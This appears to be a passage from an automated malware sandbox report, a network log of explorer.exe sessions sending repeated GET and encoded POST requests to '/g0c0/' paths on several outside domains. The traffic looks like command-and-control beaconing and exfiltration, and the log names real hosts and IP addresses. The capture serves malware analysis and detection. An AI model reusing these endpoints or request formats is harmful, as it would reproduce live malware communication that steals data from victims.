Mar 2, 2023 17:21:07.961452007 CET	1113	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 Data Ascii: p--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,4

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49744	208.109.43.28	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:10.570705891 CET	1144	OUT	GET /g0c0/?J1ZahCdL=Ssx6YM16hj7Dv4NxMqBhL/VgmmEJsfNRJMtf4nUH3Oq+Hm/bZsBBuE50eRLU4xhus+IRzU4TY0HA5BfycHQ3+Whne8bGtbEpvMOauzDGx7DW&uEk=kKVhb1ODb HTTP/1.1 Host: www.bestservicesandtrade.org Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:21:10.783762932 CET	1144	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 02 Mar 2023 16:21:10 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://bestservicesandtrade.org/g0c0/?J1ZahCdL=Ssx6YM16hj7Dv4NxMqBhL/VgmmEJsfNRJMtf4nUH3Oq+Hm/bZsBBuE50eRLU4xhus+IRzU4TY0HA5BfycHQ3+Whne8bGtbEpvMOauzDGx7DW&uEk=kKVhb1ODb Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49745	49.212.180.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:16.405427933 CET	1145	OUT	POST /g0c0/ HTTP/1.1 Host: www.denko-kosan.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.denko-kosan.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.denko-kosan.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 79 34 73 4c 35 30 73 6b 6b 70 6a 48 6d 6d 78 5a 6e 6f 62 38 42 35 79 61 6f 61 65 37 37 4d 67 73 49 39 28 51 6f 6f 51 51 32 38 4e 5a 6e 65 70 66 4e 44 32 38 34 35 79 65 78 5a 4b 32 6b 6d 7a 63 55 55 73 54 59 4d 79 5a 44 5a 62 70 58 61 43 50 57 62 54 6a 66 6e 71 38 58 57 58 49 66 35 39 48 66 34 39 44 31 67 35 73 57 68 70 44 75 49 52 32 36 49 59 79 56 4b 55 4d 63 6c 59 31 78 73 68 48 6b 70 66 4e 52 58 4b 6c 41 41 30 38 42 51 4f 76 38 50 35 72 30 4c 34 66 57 5a 49 5f 32 4e 45 63 71 30 59 64 63 35 6e 66 7a 35 57 5f 44 48 39 37 32 41 79 37 4b 6e 49 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=y4sL50skkpjHmmxZnob8B5yaoae77MgsI9(QooQQ28NZnepfND2845yexZK2kmzcUUsTYMyZDZbpXaCPWbTjfnq8XWXIf59Hf49D1g5sWhpDuIR26IYyVKUMclY1xshHkpfNRXKlAA08BQOv8P5r0L4fWZI_2NEcq0Ydc5nfz5W_DH972Ay7KnI.
Mar 2, 2023 17:21:16.679384947 CET	1146	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 Mar 2023 16:21:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49746	49.212.180.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:19.207670927 CET	1148	OUT	POST /g0c0/ HTTP/1.1 Host: www.denko-kosan.com Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.denko-kosan.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.denko-kosan.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 79 34 73 4c 35 30 73 6b 6b 70 6a 48 6b 46 70 5a 6d 4a 62 38 4b 35 79 62 72 61 65 37 79 73 67 67 49 39 37 51 6f 73 4a 49 32 4b 64 5a 6d 4e 68 66 4e 67 65 38 6f 4a 79 65 6c 70 4c 39 6e 57 7a 47 55 56 4e 71 59 4f 72 73 44 62 58 70 57 35 4b 50 51 65 50 67 51 33 71 2d 41 6d 58 50 66 35 39 53 66 35 52 50 31 67 39 53 57 68 68 44 75 38 70 32 37 34 59 31 4a 61 55 4d 63 6c 59 35 78 73 68 37 6b 70 58 56 52 57 54 69 41 79 73 38 41 31 43 76 77 49 74 73 79 4c 34 62 61 35 4a 74 33 5f 56 6f 71 32 56 63 66 4c 7a 62 71 4b 69 4a 44 58 73 2d 78 67 69 6f 52 67 4b 56 4b 49 37 43 6e 42 30 45 55 70 39 57 6a 5f 57 52 41 4d 42 63 57 34 46 33 4e 5f 59 61 71 50 70 31 61 2d 61 6e 30 55 66 61 37 62 33 71 36 65 73 6c 39 67 35 57 38 30 49 51 54 59 64 4e 68 66 61 44 6c 65 35 6d 71 67 6d 70 41 4d 37 72 31 67 52 48 46 63 4c 72 41 32 71 59 69 32 54 6d 4e 56 67 62 31 48 52 56 64 70 49 70 6b 4f 7a 4b 77 4b 65 68 77 31 48 51 64 72 62 70 57 38 6a 65 45 48 44 75 56 35 63 6b 66 5f 39 45 37 33 65 77 6a 7a 42 6b 66 71 6a 47 59 61 33 75 49 74 69 58 79 47 6b 7a 43 6d 75 56 4f 2d 54 2d 69 58 74 73 39 52 34 63 71 52 63 50 75 58 4b 36 7e 6e 79 36 33 76 69 41 47 50 76 57 55 70 64 61 66 44 75 49 54 6a 61 79 71 7a 50 64 41 62 67 48 41 68 36 2d 35 43 73 65 4b 39 38 4a 52 78 28 57 4a 79 4b 67 74 72 39 41 76 6a 4e 71 50 79 6f 6c 37 47 45 37 75 6f 7e 76 6e 49 39 58 4d 62 50 30 34 66 44 41 71 6b 39 65 30 4a 59 4c 75 5a 30 6b 6c 51 7e 58 6d 44 41 54 43 31 7e 61 72 6e 65 33 67 33 48 43 71 74 6e 59 6d 64 69 61 72 51 4b 49 7a 65 70 75 75 63 79 49 74 45 42 5f 74 6c 35 38 71 30 6b 52 6c 58 51 68 50 72 6d 4f 4a 38 31 64 6e 4e 61 66 75 34 32 6a 31 30 57 41 56 53 66 54 70 5a 4f 6f 66 69 66 32 59 52 61 36 73 32 28 36 77 65 28 48 42 6b 76 62 4b 5f 6e 30 55 54 31 42 48 33 58 35 4a 69 72 76 45 69 37 32 4e 5a 63 61 61 4a 6c 38 59 33 78 41 6c 44 57 70 39 55 71 70 67 44 4c 63 50 32 63 31 5a 62 47 70 6d 77 28 74 43 5a 32 38 51 33 68 47 4b 79 77 6b 33 37 4c 33 53 45 4d 4f 67 2d 69 49 77 4d 7a 68 65 70 4c 37 51 48 57 48 50 4b 69 44 64 6e 57 41 53 48 49 32 68 63 6d 4b 36 35 63 64 31 76 48 77 51 55 77 4b 4f 51 28 70 64 58 52 55 50 33 61 67 4a 6b 44 72 56 39 6d 35 44 4b 56 61 28 59 64 64 62 71 7a 33 6c 67 75 48 67 74 37 35 4d 69 4b 6d 42 33 5a 58 6f 70 6a 70 55 4e 53 72 36 37 31 51 45 53 37 71 33 4c 4e 38 41 31 30 6b 6d 59 41 46 35 59 39 6d 4f 4a 4c 4c 57 70 37 68 51 4f 28 59 36 69 4d 69 75 5f 66 4f 64 52 47 34 79 53 6a 68 59 79 6d 68 75 63 6e 79 38 36 71 33 30 4e 37 48 51 49 4c 79 31 35 4b 33 30 39 67 6c 6e 34 45 65 7e 5f 6e 68 46 43 71 47 41 51 38 38 42 62 71 61 35 30 49 71 61 45 77 54 74 59 68 4a 35 39 61 4c 68 47 73 34 61 4c 59 58 7e 2d 53 6a 4c 59 72 56 6f 64 46 78 66 37 56 59 36 58 6e 48 79 70 4e 78 63 6d 52 43 4e 66 38 37 48 6e 59 55 43 33 43 70 79 4d 64 5f 65 61 68 35 31 55 38 71 36 39 36 4c 43 58 4a 43 39 71 42 77 6a 52 6b 75 4c 32 49 47 57 52 4e 44 63 72 34 46 51 45 6d 63 50 77 51 6c 47 71 30 45 36 31 68 65 28 71 78 33 7e 52 43 47 69 48 39 79 4d 31 39 54 4a 46 39 6e 44 44 6f 49 47 4e 4d 59 51 7a 76 58 6d 71 47 46 57 77 4a 69 31 38 59 70 55 6a 35 73 7e 6c 50 79 72 6e 70 46 4a 54 28 64 70 65 6b 58 77 54 6a 66 6c 49 57 4c 79 77 54 4c 30 6f 62 59 50 6d 57 47 67 48 38 32 33 6e 43 52 61 6f 55 49 6d 4b 7a 38 66 51 6f 75 4d 67 62 50 79 6b 4f 67 35 55 33 61 61 4a 4c 51 65 2d 4d 78 52 5f 74 74 78 53 74 51 41 65 44 69 39 6e 4e 61 28 52 48 79 53 36 4a 6f 72 35 4d 30 7e 54 4c 31 34 38 58 41 6e 47 64 42 48 59 34 77 4a 35 39 77 47 51 69 61 46 58 79 36 5a 79 42 5a 63 36 33 77 36 32 64 57 52 6a 77 31 62 52 71 70 6f 35 4b 56 77 45 32 38 35 49 7e 5f 54 50 55 33 6d 31 64 70 55 4c 44 37 71 78 31 6b 43 68 75 6e 58 70 44 4f 58 4b 4c 47 6d 69 30 4d 7e 44 47 73 28 65 4c 30 39 32 56 42 48 33 68 62 63 65 59 6a 45 45 51 4d 77 30 64 7a 34 38 5a 67 43 6b 6e 6c 49 6e 6e 78 79 63 64 79 6a 72 58 4f 39 48 70 50 59 45 6d 5a 71 73 59 46 65 66 6b 51 6b 79 6f 6a 49 52 63 46 4a 79 28 46 54 4c 5a 79 49 6b 62 5f 73 46 44 35 74 79 7a 43 6a 37 43 31 45 76 39 41 6d 62 77 46 73 34 6c 73 73 45 70 74 6e 55 39 6f 56 39 7e 53 77 73 55 50 42 48 6c 64 68 30 67 68 45 73 7e 4c 36 54 6a 53 63 34 46 31 64 49 Data Ascii: J1ZahCdL=y4sL50skkpjHkFpZmJb8K5ybrae7ysggI97QosJI2KdZmNhfNge8oJyelpL9nWzGUVNqYOrsDbXpW5KPQePgQ3q-AmXPf59Sf5RP1g9SWhhDu8p274Y1JaUMclY5xsh7kpXVRWTiAys8A1CvwItsyL4ba5Jt3_Voq2VcfLzbqKiJDXs-xgioRgKVKI7CnB0EUp9Wj_WRAMBcW4F3N_YaqPp1a-an0Ufa7b3q6esl9g5W80IQTYdNhfaDle5mqgmpAM7r1gRHFcLrA2qYi2TmNVgb1HRVdpIpkOzKwKehw1HQdrbpW8jeEHDuV5ckf_9E73ewjzBkfqjGYa3uItiXyGkzCmuVO-T-iXts9R4cqRcPuXK6~ny63viAGPvWUpdafDuITjayqzPdAbgHAh6-5CseK98JRx(WJyKgtr9AvjNqPyol7GE7uo~vnI9XMbP04fDAqk9e0JYLuZ0klQ~XmDATC1~arne3g3HCqtnYmdiarQKIzepuucyItEB_tl58q0kRlXQhPrmOJ81dnNafu42j10WAVSfTpZOofif2YRa6s2(6we(HBkvbK_n0UT1BH3X5JirvEi72NZcaaJl8Y3xAlDWp9UqpgDLcP2c1ZbGpmw(tCZ28Q3hGKywk37L3SEMOg-iIwMzhepL7QHWHPKiDdnWASHI2hcmK65cd1vHwQUwKOQ(pdXRUP3agJkDrV9m5DKVa(Yddbqz3lguHgt75MiKmB3ZXopjpUNSr671QES7q3LN8A10kmYAF5Y9mOJLLWp7hQO(Y6iMiu_fOdRG4ySjhYymhucny86q30N7HQILy15K309gln4Ee~_nhFCqGAQ88Bbqa50IqaEwTtYhJ59aLhGs4aLYX~-SjLYrVodFxf7VY6XnHypNxcmRCNf87HnYUC3CpyMd_eah51U8q696LCXJC9qBwjRkuL2IGWRNDcr4FQEmcPwQlGq0E61he(qx3~RCGiH9yM19TJF9nDDoIGNMYQzvXmqGFWwJi18YpUj5s~lPyrnpFJT(dpekXwTjflIWLywTL0obYPmWGgH823nCRaoUImKz8fQouMgbPykOg5U3aaJLQe-MxR_ttxStQAeDi9nNa(RHyS6Jor5M0~TL148XAnGdBHY4wJ59wGQiaFXy6ZyBZc63w62dWRjw1bRqpo5KVwE285I~_TPU3m1dpULD7qx1kChunXpDOXKLGmi0M~DGs(eL092VBH3hbceYjEEQMw0dz48ZgCknlInnxycdyjrXO9HpPYEmZqsYFefkQkyojIRcFJy(FTLZyIkb_sFD5tyzCj7C1Ev9AmbwFs4lssEptnU9oV9~SwsUPBHldh0ghEs~L6TjSc4F1dItTiyRQQ1sZQggXuzdjDpXW~aCBDP3pWdtYH07JE2Ldiviw5Yd-2zdj7scW04(i6DN_5Edh~hXRxBMhyuykU3hZg3zAIWo.
Mar 2, 2023 17:21:19.481684923 CET	1149	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 Mar 2023 16:21:19 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49747	49.212.180.95	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:22.998176098 CET	1149	OUT	GET /g0c0/?J1ZahCdL=/6Er6B5poJy6uHF8k8/pGsLsu4euo955QrzgoZ5Znatjjq1COwyHxIeo18D9pRj5Ci1gcOGYIaPue4yNBcevRXCJfkbYK/JSWMth+St+cVQ7&uEk=kKVhb1ODb HTTP/1.1 Host: www.denko-kosan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:21:23.273761988 CET	1150	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 Mar 2023 16:21:23 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49727	142.250.203.110	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49749	66.235.200.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:29.712152958 CET	1157	OUT	POST /g0c0/ HTTP/1.1 Host: www.shivanshnegi.com Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.shivanshnegi.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.shivanshnegi.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 50 32 69 35 63 30 42 6f 48 36 70 37 55 6e 38 35 6f 68 75 6c 66 71 36 6f 67 72 72 5a 77 43 6f 47 57 72 6b 63 71 67 30 47 61 76 66 78 76 51 79 70 39 35 66 5f 68 2d 42 44 35 45 57 2d 59 6e 59 4d 75 55 47 65 38 59 30 71 48 78 41 5f 53 62 61 71 31 6e 68 64 77 6a 38 63 79 58 49 6c 49 69 4e 45 55 34 66 39 6e 52 67 57 35 32 78 55 7e 52 4d 31 6b 2d 74 42 54 79 4b 49 6c 42 57 44 43 72 42 52 39 38 48 70 49 44 64 68 57 6d 41 32 65 51 47 4a 7a 61 6d 6e 6e 43 73 77 47 4f 4b 47 79 76 79 2d 59 58 6a 59 6c 63 56 32 61 6b 33 6f 4c 51 4d 69 58 77 57 44 50 33 63 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=P2i5c0BoH6p7Un85ohulfq6ogrrZwCoGWrkcqg0GavfxvQyp95f_h-BD5EW-YnYMuUGe8Y0qHxA_Sbaq1nhdwj8cyXIlIiNEU4f9nRgW52xU~RM1k-tBTyKIlBWDCrBR98HpIDdhWmA2eQGJzamnnCswGOKGyvy-YXjYlcV2ak3oLQMiXwWDP3c.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49750	66.235.200.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:32.250197887 CET	1160	OUT	POST /g0c0/ HTTP/1.1 Host: www.shivanshnegi.com Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.shivanshnegi.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.shivanshnegi.com/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 50 32 69 35 63 30 42 6f 48 36 70 37 56 48 4d 35 71 41 75 6c 55 71 36 76 76 4c 72 5a 35 69 6f 43 57 71 59 63 71 6b 45 6f 61 64 7a 78 73 48 65 70 38 61 33 5f 6a 2d 42 44 78 6b 57 36 63 6e 5a 48 75 55 43 38 38 64 5a 64 48 79 73 5f 54 38 65 71 69 31 4a 65 37 7a 38 65 35 33 49 6d 49 69 4e 72 55 34 76 35 6e 52 56 7a 35 32 35 55 7e 6a 55 31 31 2d 74 47 64 53 4b 49 6c 42 58 52 43 72 41 79 39 38 75 36 49 43 45 6b 57 30 59 32 65 78 6d 4a 31 4a 4f 6d 68 43 74 33 4c 75 4c 52 7a 66 58 48 66 42 7a 65 6d 5a 52 6d 46 32 72 39 42 68 68 33 46 52 65 68 61 42 72 5a 49 79 70 76 50 35 53 4f 6f 54 4e 38 38 6e 79 58 6f 39 72 57 62 6c 48 46 46 4e 4f 7a 76 6f 55 62 28 6d 6f 4e 52 70 35 79 69 35 71 7a 62 38 5a 30 72 5f 70 49 4c 71 56 39 7e 63 42 33 41 46 28 6f 4b 68 55 6f 71 47 73 50 68 4e 30 48 4e 31 4f 37 50 78 28 48 7a 66 48 54 73 7a 6e 77 38 4f 39 56 43 70 4c 43 4c 6a 74 61 48 6b 28 72 79 33 36 69 6f 66 50 73 4a 72 78 39 79 53 53 50 70 62 77 66 45 63 4b 4d 6a 65 6c 44 36 4c 49 4e 55 77 39 51 59 65 62 4e 61 4f 44 63 51 5a 6f 54 43 53 79 46 4b 68 7e 75 79 73 45 6b 68 71 71 2d 33 6f 67 6b 63 66 75 55 52 72 48 6f 6d 71 4c 54 7a 48 53 56 52 4f 62 2d 43 51 6f 35 75 79 51 32 49 32 43 6e 46 4c 76 30 6f 4d 75 55 58 57 69 6b 64 63 58 47 70 48 6a 70 37 5f 38 5f 38 47 71 4b 7e 43 38 5f 51 2d 50 75 56 48 28 75 66 65 73 7a 68 77 4e 42 67 72 73 57 7e 38 37 6d 4e 71 50 62 63 54 53 57 39 4b 48 42 5a 4c 32 53 4a 54 57 33 50 59 4e 45 52 41 59 4a 4b 39 78 57 74 58 6c 64 77 46 4c 50 57 30 69 7a 5a 71 51 77 6e 4e 47 6c 30 70 58 46 59 32 50 6f 6c 57 57 34 73 4b 53 50 50 4b 75 76 78 34 7e 61 79 79 6f 6a 78 77 52 50 66 34 53 52 4b 75 6c 34 38 39 71 4c 39 34 42 64 37 56 54 66 5a 63 4d 2d 59 4c 58 59 77 6f 69 67 54 50 34 4f 46 4d 59 33 54 31 43 76 58 69 6d 77 56 4e 59 36 68 30 76 34 4a 37 48 41 63 7a 4f 4c 78 43 57 58 47 5f 45 61 54 70 70 46 51 47 4d 61 42 59 74 4b 44 59 6b 6b 46 39 68 52 58 74 76 53 61 49 52 4e 6b 44 6c 2d 39 74 61 43 41 56 47 59 7a 6f 71 78 4c 45 76 59 68 77 57 61 34 56 6d 4b 41 5f 71 56 32 4f 59 32 6a 47 6a 74 50 54 4b 45 4d 64 75 34 74 55 38 56 4d 70 57 5a 6a 6f 67 6d 59 37 51 5f 44 5f 32 56 62 47 6d 51 33 54 39 6a 34 77 68 4e 36 34 4a 6b 76 51 76 73 73 4f 59 64 61 37 4d 4f 77 4a 6a 6c 64 75 44 38 66 36 58 49 54 36 74 4d 58 39 50 44 4c 4a 50 4c 4c 4f 57 51 45 4e 31 54 78 50 42 77 48 5a 68 52 53 5f 45 4e 65 54 36 4e 32 66 62 65 54 30 7e 39 7a 32 51 79 62 65 42 33 50 71 6f 34 7e 58 36 76 4d 45 6b 78 62 7a 44 56 65 5f 30 37 33 50 67 71 33 38 61 33 6d 30 32 6f 32 6d 79 61 6b 4d 62 77 6d 32 6a 71 56 72 78 73 55 31 56 68 46 6c 53 36 55 4a 30 76 28 4a 4d 62 7a 34 4d 6f 69 2d 28 35 6f 78 59 4b 58 64 57 47 55 66 71 5f 4a 6e 6d 57 4c 2d 37 5f 6e 61 76 30 49 6d 62 6f 74 30 57 4e 28 71 30 5f 28 79 73 37 66 58 6d 57 7e 72 62 61 68 6f 67 68 7e 33 5a 58 64 6b 44 68 4d 71 69 65 7e 4c 4a 76 72 4b 4e 76 78 4a 6d 75 74 56 58 6f 6b 72 6e 51 72 45 78 70 57 79 7e 49 70 34 75 70 46 61 66 49 44 77 76 5a 34 48 57 49 56 52 6d 4c 52 7a 44 6f 44 73 71 4b 48 36 58 75 58 45 73 6d 36 6c 33 36 65 6c 66 78 68 35 76 5a 64 58 32 65 73 46 52 65 7a 59 74 41 66 4d 5a 54 73 34 77 45 64 48 4a 43 4c 77 41 79 31 42 4b 66 4d 79 7e 62 5a 6f 31 71 41 4a 73 46 32 74 76 57 39 37 69 33 57 59 6a 4b 66 79 4f 4d 59 45 66 4a 71 57 6c 6f 72 71 79 4a 4f 47 30 43 54 59 6c 6f 67 68 38 65 5a 63 4a 43 56 4b 39 63 64 77 66 58 32 71 79 61 66 6a 58 61 67 32 62 55 44 68 78 45 31 52 75 47 49 63 73 62 66 30 4b 76 39 62 6f 46 66 5f 4a 71 77 79 50 76 6c 57 49 71 34 64 56 42 6f 6f 63 37 45 39 6b 35 6e 66 32 49 6c 57 4f 49 48 64 31 38 4a 4d 68 38 71 32 64 32 36 32 4d 37 59 33 49 67 6e 6b 69 69 6a 32 34 6d 45 52 76 6f 4f 56 72 79 6a 44 31 70 31 39 4d 70 31 54 7a 31 6e 46 4a 46 75 53 61 38 46 4b 39 33 6d 30 54 77 62 38 31 4c 6a 43 28 75 35 34 7e 6e 6d 4e 63 44 76 39 72 2d 6a 73 28 77 6a 31 4b 34 62 31 45 34 56 69 37 6c 58 69 35 66 54 4f 76 75 34 70 32 70 75 59 62 75 4e 71 43 4f 28 7a 31 4e 53 32 57 52 32 6c 6a 58 4d 78 36 69 41 55 34 78 6e 69 51 77 6b 63 4e 4b 63 41 72 55 5a 76 62 67 57 6d 78 75 61 68 6b 62 63 74 6f 69 4d 56 39 74 4f 31 34 75 61 75 58 57 41 4b 4e 2d 57 6e 52 30 49 6d Data Ascii: J1ZahCdL=P2i5c0BoH6p7VHM5qAulUq6vvLrZ5ioCWqYcqkEoadzxsHep8a3_j-BDxkW6cnZHuUC88dZdHys_T8eqi1Je7z8e53ImIiNrU4v5nRVz525U~jU11-tGdSKIlBXRCrAy98u6ICEkW0Y2exmJ1JOmhCt3LuLRzfXHfBzemZRmF2r9Bhh3FRehaBrZIypvP5SOoTN88nyXo9rWblHFFNOzvoUb(moNRp5yi5qzb8Z0r_pILqV9~cB3AF(oKhUoqGsPhN0HN1O7Px(HzfHTsznw8O9VCpLCLjtaHk(ry36iofPsJrx9ySSPpbwfEcKMjelD6LINUw9QYebNaODcQZoTCSyFKh~uysEkhqq-3ogkcfuURrHomqLTzHSVROb-CQo5uyQ2I2CnFLv0oMuUXWikdcXGpHjp7_8_8GqK~C8_Q-PuVH(ufeszhwNBgrsW~87mNqPbcTSW9KHBZL2SJTW3PYNERAYJK9xWtXldwFLPW0izZqQwnNGl0pXFY2PolWW4sKSPPKuvx4~ayyojxwRPf4SRKul489qL94Bd7VTfZcM-YLXYwoigTP4OFMY3T1CvXimwVNY6h0v4J7HAczOLxCWXG_EaTppFQGMaBYtKDYkkF9hRXtvSaIRNkDl-9taCAVGYzoqxLEvYhwWa4VmKA_qV2OY2jGjtPTKEMdu4tU8VMpWZjogmY7Q_D_2VbGmQ3T9j4whN64JkvQvssOYda7MOwJjlduD8f6XIT6tMX9PDLJPLLOWQEN1TxPBwHZhRS_ENeT6N2fbeT0~9z2QybeB3Pqo4~X6vMEkxbzDVe_073Pgq38a3m02o2myakMbwm2jqVrxsU1VhFlS6UJ0v(JMbz4Moi-(5oxYKXdWGUfq_JnmWL-7_nav0Imbot0WN(q0_(ys7fXmW~rbahogh~3ZXdkDhMqie~LJvrKNvxJmutVXokrnQrExpWy~Ip4upFafIDwvZ4HWIVRmLRzDoDsqKH6XuXEsm6l36elfxh5vZdX2esFRezYtAfMZTs4wEdHJCLwAy1BKfMy~bZo1qAJsF2tvW97i3WYjKfyOMYEfJqWlorqyJOG0CTYlogh8eZcJCVK9cdwfX2qyafjXag2bUDhxE1RuGIcsbf0Kv9boFf_JqwyPvlWIq4dVBooc7E9k5nf2IlWOIHd18JMh8q2d262M7Y3Ignkiij24mERvoOVryjD1p19Mp1Tz1nFJFuSa8FK93m0Twb81LjC(u54~nmNcDv9r-js(wj1K4b1E4Vi7lXi5fTOvu4p2puYbuNqCO(z1NS2WR2ljXMx6iAU4xniQwkcNKcArUZvbgWmxuahkbctoiMV9tO14uauXWAKN-WnR0ImQsnrZHjkOpwhORupgpnEHQebL9vrmCNhgLAkfNM_cVqMsaJOg66FDucJeVvXETdooqiiRUDJZHMt9K4lm_fgseI69asWI.
